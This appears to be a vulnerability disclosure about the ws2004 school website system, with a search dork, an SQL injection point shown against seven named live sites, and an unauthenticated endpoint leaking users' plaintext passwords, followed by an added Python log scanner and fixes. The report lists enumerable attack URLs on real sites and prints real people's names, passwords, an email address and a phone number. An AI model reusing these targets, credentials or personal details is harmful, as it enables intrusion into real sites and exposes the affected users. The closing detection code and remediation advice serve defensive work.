### Brief description:

Bundled vulnerabilities

### Detailed description:

Baidu search: inurl:ws2004

Technical support: 南京苏亚星资讯科技开发有限公司

Bundling these here rather than submitting them one by one.

----------------

0x01: SQL injection vulnerability

Vulnerable page: ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=

Vulnerable parameter: ID

Proof:

1# http://www.sdwhys.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*

![QQ图片20150106221416.jpg](https://images.seebug.org/upload/201501/14152457f109cdf365f1baa0db78580419034e15.jpg)

![QQ图片20150106221511.jpg](https://images.seebug.org/upload/201501/14152506d79c064bde121adea2f5353b385d9c81.jpg)

2# http://www.sgtjb.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*

![QQ图片20150106221603.jpg](https://images.seebug.org/upload/201501/14152555fbfee37b9e3e65dbd18e5cb4125960aa.jpg)

![QQ图片20150106221635.jpg](https://images.seebug.org/upload/201501/14152609c6038a7e4267eb607fcc15fb33e20fcf.jpg)

3# http://www.fzjcxx.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*

![QQ图片20150106221740.jpg](https://images.seebug.org/upload/201501/14152625c275e9ce594f3069e5a29e34d0b08830.jpg)

![QQ图片20150106221759.jpg](https://images.seebug.org/upload/201501/141526358f1fb8eae0027e94b6ba93613af1d2c6.jpg)

4# http://www.wuai.lwedu.sh.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*

![QQ图片20150106221945.jpg](https://images.seebug.org/upload/201501/1415272612986694aca73173f7244c209c60f9f5.jpg)

![QQ图片20150106222012.jpg](https://images.seebug.org/upload/201501/1415273848046e17a6d7087e9aa7a54bc999053e.jpg)

5# http://www.yzsx.net.cn/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*

![QQ图片20150106222104.jpg](https://images.seebug.org/upload/201501/141528239c76a84c52a2512fdb9b65784c5ffe88.jpg)

![QQ图片20150106222138.jpg](https://images.seebug.org/upload/201501/14152835f60cf673fefe5196961b677fcf56ed3c.jpg)

6# http://www.sndsx.com/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*

![QQ图片20150106222306.jpg](https://images.seebug.org/upload/201501/14153010dbf3c4ec09bf3728870ff508d539dc90.jpg)

![QQ图片20150106222332.jpg](https://images.seebug.org/upload/201501/141530272ae85c0b1bec5f31d2d606d0db11f8ac.jpg)

7# http://www.yygy.net/ws2004/SysManage/Research/DiaoChaZhuTi/add.asp?ID=48*

![QQ图片20150106222500.jpg](https://images.seebug.org/upload/201501/14153037aa8101b4ae39ae8c74466a3b93d46d93.jpg)

![QQ图片20150106222526.jpg](https://images.seebug.org/upload/201501/14153045d5c590b0fd078582b091167d8d15a2c7.jpg)

0x02: Retrieving any registered user's plaintext password

Note: this is similar to [WooYun: Design flaw in a campus management system allows retrieving any administrator's plaintext password (no login required)](http://www.wooyun.org/bugs/wooyun-2015-090403), but it is not the same entry point. This one returns registered users' information and passwords, and the IDs can be enumerated. Opening the link directly shows a blank page; use "View source" to see the information.

1# http://www.cgyz.net.cn/ws2004/

http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=56

```
<?xml version="1.0" encoding="GB2312"?>
<DataListAll><DataList><UserName><![CDATA[xuan]]></UserName><RealName><![CDATA[王萱]]></RealName><PassWords><![CDATA[120428]]></PassWords><Question><![CDATA[]]></Question><Answer><![CDATA[]]></Answer><UserType><![CDATA[1]]></UserType><Email><![CDATA[]]></Email><PersonWeb><![CDATA[]]></PersonWeb><Telephone><![CDATA[]]></Telephone><City><![CDATA[]]></City><Province><![CDATA[]]></Province><Country><![CDATA[]]></Country></DataList></DataListAll>
```

http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=40

http://www.cgyz.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=49

……

2# http://www.eedsyz.cn/ws2004/

http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=39

```
<?xml version="1.0" encoding="GB2312"?>
<DataListAll><DataList><UserName><![CDATA[真如本性]]></UserName><RealName><![CDATA[刘真如]]></RealName><PassWords><![CDATA[liuzhenru*()21]]></PassWords><Question><![CDATA[]]></Question><Answer><![CDATA[]]></Answer><UserType><![CDATA[1]]></UserType><Email><![CDATA[1179926121@qq.com]]></Email><PersonWeb><![CDATA[]]></PersonWeb><Telephone><![CDATA[15304776395]]></Telephone><City><![CDATA[东胜区]]></City><Province><![CDATA[内蒙古自治区]]></Province><Country><![CDATA[中华人民共和国]]></Country></DataList></DataListAll>
```

http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=46

http://www.eedsyz.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=50

……

3# http://www.sndsx.com/ws2004/

http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=24

http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=25

http://www.sndsx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=62

……

4# http://www.wzzx.net.cn/ws2004/

http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=11

http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=39

http://www.wzzx.net.cn/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=22

……

5# http://www.hwsyxx.com/ws2004/

http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=67

http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=83

http://www.hwsyxx.com/ws2004/SysManage/UserManage/RegManage/editxml.asp?ID=71

……

### Proof of vulnerability:
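For operators of an affected ws2004 site, the following is an added example (not part of the original report and not vendor code) that scans web-server logs for the two request patterns described under 0x01 and 0x02: non-numeric `ID` values sent to `add.asp`, and one client requesting many distinct `ID` values from `editxml.asp`. The log field order, the threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Paths from the report, lower-cased because IIS treats URL paths case-insensitively.
EDITXML = "/ws2004/sysmanage/usermanage/regmanage/editxml.asp"
ADD_ASP = "/ws2004/sysmanage/research/diaochazhuti/add.asp"
NUMERIC_ID = re.compile(r"\d{1,9}")
ENUM_THRESHOLD = 3  # assumption: distinct IDs from one client before flagging

# Constructed sample log lines (not real traffic). Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2015-01-06 14:15:01 192.0.2.10 GET /ws2004/SysManage/UserManage/RegManage/editxml.asp ID=39 200
2015-01-06 14:15:02 192.0.2.10 GET /ws2004/SysManage/UserManage/RegManage/editxml.asp ID=40 200
2015-01-06 14:15:03 192.0.2.10 GET /ws2004/SysManage/UserManage/RegManage/editxml.asp ID=41 200
2015-01-06 14:16:10 198.51.100.7 GET /ws2004/SysManage/UserManage/RegManage/editxml.asp ID=12 200
2015-01-06 14:17:30 203.0.113.5 GET /ws2004/SysManage/Research/DiaoChaZhuTi/add.asp ID=48%27 500
2015-01-06 14:18:00 198.51.100.7 GET /ws2004/SysManage/Research/DiaoChaZhuTi/add.asp ID=48 200
"""


def analyze(log_text, threshold=ENUM_THRESHOLD):
    """Return (enumerating clients -> distinct ID count, non-numeric ID hits)."""
    ids_by_client = defaultdict(set)
    non_numeric = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip W3C header directives and short lines
        client, stem, query = fields[2], fields[4].lower(), fields[5]
        params = parse_qs(query, keep_blank_values=True)
        # Classic ASP reads query keys case-insensitively, so match "id" loosely.
        ids = [v for k, vals in params.items() if k.lower() == "id" for v in vals]
        if stem == EDITXML:
            ids_by_client[client].update(ids)
        elif stem == ADD_ASP:
            non_numeric += [(client, v) for v in ids if not NUMERIC_ID.fullmatch(v)]
    enumerators = {c: len(s) for c, s in ids_by_client.items() if len(s) >= threshold}
    return enumerators, non_numeric


if __name__ == "__main__":
    enumerators, non_numeric = analyze(SAMPLE_LOG)
    print("editxml.asp enumeration:", enumerators)
    print("add.asp non-numeric ID:", non_numeric)
```

Log review only shows exposure after the fact; the fixes belong in the application: require an authenticated session before `editxml.asp` returns anything, stop returning the `PassWords` field, and pass `ID` to the query as an integer parameter.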